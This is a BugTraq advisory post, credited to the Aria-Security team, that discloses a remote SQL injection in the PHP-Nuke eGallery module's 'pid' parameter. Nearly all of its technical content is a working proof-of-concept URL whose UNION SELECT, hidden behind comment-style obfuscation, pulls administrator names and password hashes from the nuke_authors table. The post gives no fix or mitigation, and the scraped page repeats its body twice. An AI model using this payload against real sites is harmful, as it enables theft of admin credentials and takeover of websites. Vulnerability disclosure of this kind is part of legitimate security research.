BugTraq
Back to list
|
Post reply
PHP-Nuke Module eGallery "pid" Remote SQL Injection
Mar 04 2008 01:41AM
no-reply Aria-security net
Aria-Security Team (Persian Security Network)
http://Aria-Security.net
-----------------------------------------------
Shoutz: AurA, NULL, imm02tal, Kinglet,
PHP-Nuke Module eGallery "pid" Remote SQL Injection
http://forum.aria-security.net/showthread.php?p=1548
PoC
modules.php?name=eGallery&file=index&op=showpic&pi d=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from
+nuke_authors/*where%20admin%201%200%202
Regards,
The-0utl4w
(credits goes to aria-security team)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://Aria-Security.net
-----------------------------------------------
Shoutz: AurA, NULL, imm02tal, Kinglet,
PHP-Nuke Module eGallery "pid" Remote SQL Injection
http://forum.aria-security.net/showthread.php?p=1548
PoC
modules.php?name=eGallery&file=index&op=showpic&pi d=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from
+nuke_authors/*where%20admin%201%200%202
Regards,
The-0utl4w
(credits goes to aria-security team)
[ reply ]